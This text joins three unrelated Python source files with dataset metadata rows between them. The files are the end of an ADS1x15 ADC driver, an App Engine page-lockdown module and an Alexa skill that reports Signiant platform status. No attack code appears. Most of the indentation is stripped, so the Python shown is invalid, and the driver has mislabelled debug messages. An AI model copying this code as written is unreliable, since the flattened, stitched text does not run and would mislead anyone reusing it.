# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.1ms to be sure
delay = 1.0/sps+0.0001
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def readADCDifferential(self, chP=0, chN=1, pga=6144, sps=250):
"Gets a differential ADC reading from channels chP and chN in mV. \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, single-shot mode
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_SINGLE
# Set channels
if ( (chP == 0) & (chN == 1) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_1
elif ( (chP == 0) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_3
elif ( (chP == 2) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_2_3
elif ( (chP == 1) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_1_3
else:
if (self.debug):
print "ADS1x15: Invalid channels specified: %d, %d" % (chP, chN)
return -1
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
    # otherwise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set 'start single-conversion' bit
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.1ms to be sure
delay = 1.0/sps+0.0001
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
val = ((result[0] << 8) | (result[1] & 0xFF)) >> 4
# (Take signed values into account as well)
if val >> 11:
val = val - 0xfff
return val*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def readADCDifferential01(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 0 and 1 in mV\
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(0, 1, pga, sps)
def readADCDifferential03(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 0 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(0, 3, pga, sps)
def readADCDifferential13(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 1 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
    return self.readADCDifferential(1, 3, pga, sps)
def readADCDifferential23(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 2 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(2, 3, pga, sps)
def startContinuousConversion(self, channel=0, pga=6144, sps=250):
"Starts the continuous conversion mode and returns the first ADC reading \
in mV from the specified channel. \
The sps controls the sample rate. \
The pga must be given in mV, see datasheet page 13 for the supported values. \
Use getLastConversionResults() to read the next values and \
stopContinuousConversion() to stop converting."
# Default to channel 0 with invalid channel, or return -1?
if (channel > 3):
if (self.debug):
print "ADS1x15: Invalid channel specified: %d" % channel
return -1
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, continuous mode
# The last flag is the only change we need, page 11 datasheet
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_CONTIN
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
    # otherwise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set the channel to be converted
if channel == 3:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_3
elif channel == 2:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_2
elif channel == 1:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_1
else:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_0
# Set 'start single-conversion' bit to begin conversions
# No need to change this for continuous mode!
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
    # Once we write the ADC will convert continuously
# we can read the next values using getLastConversionResult
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.5ms to be sure
delay = 1.0/sps+0.0005
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def startContinuousDifferentialConversion(self, chP=0, chN=1, pga=6144, sps=250):
"Starts the continuous differential conversion mode and returns the first ADC reading \
in mV as the difference from the specified channels. \
The sps controls the sample rate. \
The pga must be given in mV, see datasheet page 13 for the supported values. \
Use getLastConversionResults() to read the next values and \
stopContinuousConversion() to stop converting."
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, continuous mode
# The last flag is the only change we need, page 11 datasheet
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_CONTIN
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
    # otherwise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set channels
if ( (chP == 0) & (chN == 1) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_1
elif ( (chP == 0) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_3
elif ( (chP == 2) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_2_3
elif ( (chP == 1) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_1_3
else:
if (self.debug):
print "ADS1x15: Invalid channels specified: %d, %d" % (chP, chN)
return -1
# Set 'start single-conversion' bit to begin conversions
# No need to change this for continuous mode!
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
    # Once we write the ADC will convert continuously
# we can read the next values using getLastConversionResult
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.5ms to be sure
delay = 1.0/sps+0.0005
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def stopContinuousConversion(self):
"Stops the ADC's conversions when in continuous mode \
and resets the configuration to its default value."
# Write the default config register to the ADC
# Once we write, the ADC will do a single conversion and
# enter power-off mode.
config = 0x8583 # Page 18 datasheet.
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
return True
def getLastConversionResults(self):
"Returns the last ADC conversion result in mV"
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*self.pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*self.pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*self.pga/32768.0
def startSingleEndedComparator(self, channel, thresholdHigh, thresholdLow, \
pga=6144, sps=250, \
activeLow=True, traditionalMode=True, latching=False, \
numReadings=1):
"Starts the comparator mode on the specified channel, see datasheet pg. 15. \
In traditional mode it alerts (ALERT pin will go low) when voltage exceeds \
thresholdHigh until it falls below thresholdLow (both given in mV). \
In window mode (traditionalMode=False) it alerts when voltage doesn't lie\
between both thresholds.\
In latching mode the alert will continue until the conversion value is read. \
numReadings controls how many readings are necessary to trigger an alert: 1, 2 or 4.\
Use getLastConversionResults() to read the current value (which may differ \
from the one that triggered the alert) and clear the alert pin in latching mode. \
This function starts the continuous conversion mode. The sps controls \
the sample rate and the pga the gain, see datasheet page 13. "
# With invalid channel return -1
if (channel > 3):
if (self.debug):
print "ADS1x15: Invalid channel specified: %d" % channel
return -1
# Continuous mode
config = self.__ADS1015_REG_CONFIG_MODE_CONTIN
if (activeLow==False):
config |= self.__ADS1015_REG_CONFIG_CPOL_ACTVHI
else:
config |= self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW
if (traditionalMode==False):
config |= self.__ADS1015_REG_CONFIG_CMODE_WINDOW
else:
config |= self.__ADS1015_REG_CONFIG_CMODE_TRAD
if (latching==True):
config |= self.__ADS1015_REG_CONFIG_CLAT_LATCH
else:
config |= self.__ADS1015_REG_CONFIG_CLAT_NONLAT
if (numReadings==4):
config |= self.__ADS1015_REG_CONFIG_CQUE_4CONV
elif (numReadings==2):
config |= self.__ADS1015_REG_CONFIG_CQUE_2CONV
else:
config |= self.__ADS1015_REG_CONFIG_CQUE_1CONV
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
    # otherwise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
if ( (sps not in self.spsADS1015) & self.debug):
print "ADS1x15: Invalid sps specified: %d, using 1600sps" % sps
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid sps specified: %d, using 250sps" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % pga
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set the channel to be converted
if channel == 3:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_3
elif channel == 2:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_2
elif channel == 1:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_1
else:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_0
# Set 'start single-conversion' bit to begin conversions
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write threshold high and low registers to the ADC
# V_digital = (2^(n-1)-1)/pga*V_analog
if (self.ic == self.__IC_ADS1015):
thresholdHighWORD = int(thresholdHigh*(2048.0/pga))
else:
thresholdHighWORD = int(thresholdHigh*(32767.0/pga))
bytes = [(thresholdHighWORD >> 8) & 0xFF, thresholdHighWORD & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_HITHRESH, bytes)
if (self.ic == self.__IC_ADS1015):
thresholdLowWORD = int(thresholdLow*(2048.0/pga))
else:
thresholdLowWORD = int(thresholdLow*(32767.0/pga))
bytes = [(thresholdLowWORD >> 8) & 0xFF, thresholdLowWORD & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_LOWTHRESH, bytes)
# Write config register to the ADC
    # Once we write the ADC will convert continuously and alert when things happen,
# we can read the converted values using getLastConversionResult
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
def startDifferentialComparator(self, chP, chN, thresholdHigh, thresholdLow, \
pga=6144, sps=250, \
activeLow=True, traditionalMode=True, latching=False, \
numReadings=1):
"Starts the comparator mode on the specified channel, see datasheet pg. 15. \
In traditional mode it alerts (ALERT pin will go low) when voltage exceeds \
thresholdHigh until it falls below thresholdLow (both given in mV). \
In window mode (traditionalMode=False) it alerts when voltage doesn't lie\
between both thresholds.\
In latching mode the alert will continue until the conversion value is read. \
numReadings controls how many readings are necessary to trigger an alert: 1, 2 or 4.\
Use getLastConversionResults() to read the current value (which may differ \
from the one that triggered the alert) and clear the alert pin in latching mode. \
This function starts the continuous conversion mode. The sps controls \
the sample rate and the pga the gain, see datasheet page 13. "
# Continuous mode
config = self.__ADS1015_REG_CONFIG_MODE_CONTIN
if (activeLow==False):
config |= self.__ADS1015_REG_CONFIG_CPOL_ACTVHI
else:
config |= self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW
if (traditionalMode==False):
config |= self.__ADS1015_REG_CONFIG_CMODE_WINDOW
else:
config |= self.__ADS1015_REG_CONFIG_CMODE_TRAD
if (latching==True):
config |= self.__ADS1015_REG_CONFIG_CLAT_LATCH
else:
config |= self.__ADS1015_REG_CONFIG_CLAT_NONLAT
if (numReadings==4):
config |= self.__ADS1015_REG_CONFIG_CQUE_4CONV
elif (numReadings==2):
config |= self.__ADS1015_REG_CONFIG_CQUE_2CONV
else:
config |= self.__ADS1015_REG_CONFIG_CQUE_1CONV
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
    # otherwise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
if ( (sps not in self.spsADS1015) & self.debug):
print "ADS1x15: Invalid sps specified: %d, using 1600sps" % sps
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid sps specified: %d, using 250sps" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % pga
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set channels
if ( (chP == 0) & (chN == 1) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_1
elif ( (chP == 0) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_3
elif ( (chP == 2) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_2_3
elif ( (chP == 1) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_1_3
else:
if (self.debug):
print "ADS1x15: Invalid channels specified: %d, %d" % (chP, chN)
return -1
# Set 'start single-conversion' bit to begin conversions
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write threshold high and low registers to the ADC
# V_digital = (2^(n-1)-1)/pga*V_analog
if (self.ic == self.__IC_ADS1015):
thresholdHighWORD = int(thresholdHigh*(2048.0/pga))
else:
thresholdHighWORD = int(thresholdHigh*(32767.0/pga))
bytes = [(thresholdHighWORD >> 8) & 0xFF, thresholdHighWORD & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_HITHRESH, bytes)
if (self.ic == self.__IC_ADS1015):
thresholdLowWORD = int(thresholdLow*(2048.0/pga))
else:
thresholdLowWORD = int(thresholdLow*(32767.0/pga))
bytes = [(thresholdLowWORD >> 8) & 0xFF, thresholdLowWORD & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_LOWTHRESH, bytes)
# Write config register to the ADC
    # Once we write the config the ADC will convert continuously and alert when things happen;
    # we can read the converted values using getLastConversionResults()
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
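

# --- Hedged usage sketch (editor's addition, not part of the original driver) ---
# Shows how the comparator API above is meant to be wired together. The ADC
# instance is taken as a parameter because the class definition and constructor
# are not shown in this excerpt; getLastConversionResults() is referenced only
# because the docstring above mentions it.
def _example_watch_differential(adc):
    """Illustrative only: alert when AIN0-AIN1 leaves the 200..1500 mV window."""
    adc.startDifferentialComparator(0, 1, 1500, 200,
                                    pga=6144, sps=250,
                                    activeLow=True, traditionalMode=False,
                                    latching=True, numReadings=2)
    # In latching mode, reading the last conversion clears the ALERT pin
    return adc.getLastConversionResults()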
| gpl-3.0 | 1,737,550,240,136,467,500 | 43.305785 | 138 | 0.650407 | false |
lugkhast/forever-alone-gae | core/privileges.py | 1 | 3131 | # forever-alone: A course and free time matching web app for college students
# Copyright (C) 2011 Lawrence Patrick Calulo
#
# This file is part of forever-alone.
#
# forever-alone is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# forever-alone is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with forever-alone. If not, see <http://www.gnu.org/licenses/>.
from google.appengine.api import users, memcache
from google.appengine.ext import db
from core import profiles
def make_app_status_dict(status):
statusDict = {}
statusDict['allowEveryone'] = status.allowEveryone
statusDict['allowPrivilegedUsers'] = status.allowPrivilegedUsers
return statusDict
def get_app_status_from_ds():
"""
Code that needs to modify the AppStatus should use this function.
"""
status = AppStatus.get_or_insert('app-status')
status.update_cache()
return status
def get_app_status():
"""
Code that does *not* need to modify the AppStatus should use this
function, as this only hits the datastore if the AppStatus is not
in memcache.
"""
namespace = 'app-status'
statusDict = memcache.get('status-dict', namespace=namespace)
if statusDict:
status = AppStatus()
status.from_dict(statusDict)
return status
return get_app_status_from_ds()
def can_access_page():
if users.is_current_user_admin():
return True
# Everyone must be allowed before new users can register
# Registering only to find that you're locked out at the moment
# probably won't be very good.
status = get_app_status()
profile = profiles.get_user_profile()
if not profile:
# If the user does not have a profile, his ability to access
# pages will be determined by the state of allowEveryone
return status.allowEveryone
if status.allowEveryone:
return True
elif profile.isPrivilegedUser and status.allowPrivilegedUsers:
return True
return False
def get_redirect_url():
return '/errors/locked.html'
class AppStatus(db.Model):
allowEveryone = db.BooleanProperty()
allowPrivilegedUsers = db.BooleanProperty()
def allow_everyone(self):
self.allowEveryone = True
self.allowPrivilegedUsers = True
self._save()
def privileged_and_admins_only(self):
self.allowEveryone = False
self.allowPrivilegedUsers = True
self._save()
def admins_only(self):
self.allowEveryone = False
self.allowPrivilegedUsers = False
self._save()
def from_dict(self, statusDict):
self.allowEveryone = statusDict['allowEveryone']
self.allowPrivilegedUsers = statusDict['allowPrivilegedUsers']
def update_cache(self):
memcache.set('status-dict', make_app_status_dict(self), namespace='app-status')
def _save(self):
self.update_cache()
self.put()
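

# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Illustrates how a request handler is expected to combine can_access_page()
# and get_redirect_url(); the `handler` object and its redirect() method are
# assumptions for illustration only.
def example_access_guard(handler):
    """Return True if the request may proceed, otherwise redirect and return False."""
    if can_access_page():
        return True
    handler.redirect(get_redirect_url())
    return False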
| agpl-3.0 | 9,016,858,172,864,464,000 | 27.990741 | 81 | 0.75024 | false |
Signiant/alexa_signiant_status | alexa_signiant_status.py | 1 | 11159 | """
Return Signiant Platform Status
"""
import time
import urllib.request, urllib.error, urllib.parse
import json
import os
# Default Signiant Status Page URL
SIGNIANT_STATUS_URL = 'https://1dmtgkjnl3y3.statuspage.io/api/v2/summary.json'
STATUS_PAGE_API_KEY = None
# We need this to be set as an env var - fail if it's not
if 'applicationId' in os.environ:
APPLICATION_ID = os.environ['applicationId']
else:
raise ValueError("No Application ID provided")
if 'statusPageUrl' in os.environ:
SIGNIANT_STATUS_URL = os.environ['statusPageUrl']
if 'statusPageApiKey' in os.environ:
STATUS_PAGE_API_KEY = os.environ['statusPageApiKey']
def get_raw_component_status():
'''
:return: list of services with their info
'''
sig_components = []
request = urllib.request.Request(SIGNIANT_STATUS_URL)
if STATUS_PAGE_API_KEY:
request.add_header("Authorization", "OAuth %s" % STATUS_PAGE_API_KEY)
r = urllib.request.urlopen(request, timeout=2)
if r.getcode() == 200:
response = json.load(r)
if 'components' in response:
sig_components = response['components']
return sig_components
def get_signiant_status():
raw_status_list = get_raw_component_status()
# {
# "status": "operational",
# "name": "v1",
# "created_at": "2016-10-21T14:20:42.069Z",
# "updated_at": "2016-12-02T20:54:28.202Z",
# "position": 1,
# "description": "Backend services for TAPIv1",
# "group_id": "1234567890",
# "showcase": false,
# "id": "2345678901",
# "page_id": "123abc456def",
# "group": false,
# "only_show_if_degraded": false
# }
# Find the groups
groups = {}
for component in raw_status_list:
if component['group']:
groups[component['id']] = component['name']
# Get statuses
signiant_services = {}
for service in raw_status_list:
if service['group_id']:
# This is part of a group - get the group's name
name = groups[service['group_id']] + ' ' + service['name']
status = service['status']
signiant_services[name] = {'status': status}
return signiant_services
def convert_status_to_readable(status):
if 'degraded_performance' in status:
return "degraded performance"
elif 'major_outage' in status:
return "major outage"
elif 'partial_outage' in status:
return "partial outage"
elif 'under_maintenance' in status:
return "under maintenance"
else:
return status
# ------------------------------ SSML Helpers ---------------------------------
def pause(duration=1000):
return '<break time="' + str(duration) + 'ms"/>'
def say_as(interpret_as, msg):
return '<say-as interpret-as="' + interpret_as + '"> ' + str(msg) + '</say-as>'
def handle_audio(url):
return "<audio src='" + url + "' />"
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, card_output, reprompt_text="",
card_image_small=None, card_image_large=None,
should_end_session=False):
outputSpeech = {
'type': 'SSML',
'ssml': "<speak>" + output + "</speak>"
}
card = {}
card['title'] = title
if card_image_small or card_image_large:
card['type'] = 'Standard'
card['text'] = card_output
card['image'] = {}
if card_image_small:
card['image']['smallImageUrl'] = card_image_small
if card_image_large:
card['image']['largeImageUrl'] = card_image_large
else:
card['type'] = 'Simple'
card['content'] = card_output
reprompt = {
'outputSpeech': {
'type': 'SSML',
'ssml': "<speak>" + reprompt_text + "</speak>"
}
}
return {
'outputSpeech': outputSpeech,
'card': card,
'reprompt': reprompt,
'shouldEndSession': should_end_session
}
def build_response(session_attributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': session_attributes,
'response': speechlet_response
}
# --------------- Functions that control the skill's behavior ------------------
def get_help_response():
card_title = "Signiant Help"
speech_output = "To request information about Signiant Platform Status, say status report" + pause() \
+ "What can I help you with?"
reprompt_text = "What can I help you with?"
return build_response({}, build_speechlet_response(
card_title, speech_output, speech_output, reprompt_text, should_end_session=False))
def get_welcome_response():
session_attributes = {}
return get_status()
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you."
return build_response({}, build_speechlet_response(
card_title, speech_output, speech_output, should_end_session=True))
def general_status():
signiant_stats = get_signiant_status()
# Get the number of services
no_signiant_services = len(signiant_stats)
signiant_problems = []
for service in signiant_stats:
if not 'operational' in signiant_stats[service]['status']:
signiant_problems.append((service, signiant_stats[service]['status']))
today = time.strftime("%A %B %d %Y")
now = time.strftime("%X UTC")
card_output = "Current Signiant Platform Status report for " + today + ' at ' + now + '\n'
for service in signiant_stats:
card_output += service + ': ' + signiant_stats[service]['status'] + '\n'
card_output += "For more information, please visit status.signiant.com"
speech_output = "Current Signiant Platform Status report for " + today + pause()
if len(signiant_problems) > 0:
# We've got a problem
for service, status in signiant_problems:
speech_output += service + ' has a status of ' + convert_status_to_readable(status) + pause()
if len(signiant_problems) < no_signiant_services:
speech_output += "All other services are operating normally" + pause()
speech_output += "For more information, please visit status.signiant.com"
else:
speech_output += "All services operating normally"
return speech_output, card_output
def get_status():
session_attributes = {}
card_title = "Signiant Platform Status"
speech_output, card_output = general_status()
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_media_shuttle():
session_attributes = {}
card_title = "Signiant Media Shuttle"
speech_output = "Media Shuttle is a SaaS solution that allows anyone to quickly and securely transfer any size file anywhere in the world"
card_output = "Media Shuttle is a SaaS solution that allows anyone to quickly and securely transfer any size file anywhere in the world."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_flight():
session_attributes = {}
card_title = "Signiant Flight"
speech_output = 'Flight is an auto scaling SaaS utility that accelerates the transfer of large files in and out of cloud object storage'
card_output = "Flight is an auto scaling SaaS utility that accelerates the transfer of large data sets into and out of cloud object storage."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_managers_and_agents():
session_attributes = {}
card_title = "Signiant Managers+Agents"
speech_output = "Managers and Agents software enables the automated delivery of large files across geographically dispersed locations"
card_output = "Managers+Agents software enables the automated delivery of large files across geographically dispersed locations."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
"""
Called when the session starts
"""
print("on_session_started requestId=" + session_started_request['requestId']
+ ", sessionId=" + session['sessionId'])
def on_launch(launch_request, session):
"""
Called when the user launches the skill without specifying what they want
"""
print("on_launch requestId=" + launch_request['requestId'] +
", sessionId=" + session['sessionId'])
# Dispatch to your skill's launch
return get_welcome_response()
def on_intent(intent_request, session):
"""
Called when the user specifies an intent for this skill
"""
print("on_intent requestId=" + intent_request['requestId'] +
", sessionId=" + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
# Dispatch to your skill's intent handlers
if intent_name == "GetStatus":
return get_status()
elif intent_name == "GetMediaShuttle":
return get_media_shuttle()
elif intent_name == "GetFlight":
return get_flight()
elif intent_name == "GetManagersAndAgents":
return get_managers_and_agents()
elif intent_name == "AMAZON.HelpIntent":
return get_help_response()
